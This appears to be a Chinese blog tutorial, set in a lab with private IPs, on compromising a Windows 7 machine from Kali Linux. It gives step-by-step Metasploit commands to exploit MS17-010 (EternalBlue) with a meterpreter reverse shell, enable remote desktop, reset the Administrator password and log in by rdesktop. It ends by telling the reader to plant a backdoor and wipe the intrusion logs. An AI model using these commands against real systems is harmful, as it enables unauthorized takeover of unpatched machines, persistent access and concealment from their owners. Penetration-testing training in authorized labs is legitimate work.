Kali下metasploit渗透Windows7/教程详细/
靶场环境
操作系统 Kali_Linux IP:172.17.201.44
靶机 windows7 IP:172.17.201.12
使用工具
metasploit
nmap
正文
1.首先使用namp对靶机进行扫描,确定445端口是否开启

2.打开metasploit搜索ms17-010
1. msfconsole
2. search ms17-010

3.选择漏洞验证扫描工具并设置参数
1. use auxiliary/admin/smb/ms17_010_command
2. set rhost 靶机ip
3. exploit 运行程序

4.选择攻击模块并设置参数
1. use exploit/windows/smb/ms17_010_eternalblue //选择模块
2. options //查看详细信息
3. set payload windows/x64/meterpreter/reverse_tcp //选择荷载
4. set rhost 靶机ip
5. set lhost 操作机ip//kali
6. exploit //运行攻击

5.攻击成功反馈

6.开启靶机3389
run getgui -e // 开启靶机3389端口(远程桌面用)

再用nmap验证一下端口是否已经开启

7.输入shell进入目标系统
shell
chcp 65001 //解决shell后windows终端乱码


8.更改靶机管理员密码
net user Administrator 12345678

9.使用kali自带的3389连接工具远程靶机
rdesktop 靶机ip//远程连接靶机

选择其他用户后输入刚才你设置的用户名与密码 //注意区分大小写

接下来生成后门放上去,清除入侵记录就好了
本文详细介绍了如何在Kali Linux环境下,使用metasploit框架对Windows7系统进行渗透测试。首先通过nmap扫描靶机445端口,然后利用metasploit的ms17-010漏洞进行攻击,成功后开启靶机的3389端口,并更改靶机管理员密码,最后通过Kali的3389连接工具远程控制靶机。
1560

被折叠的 条评论
为什么被折叠?



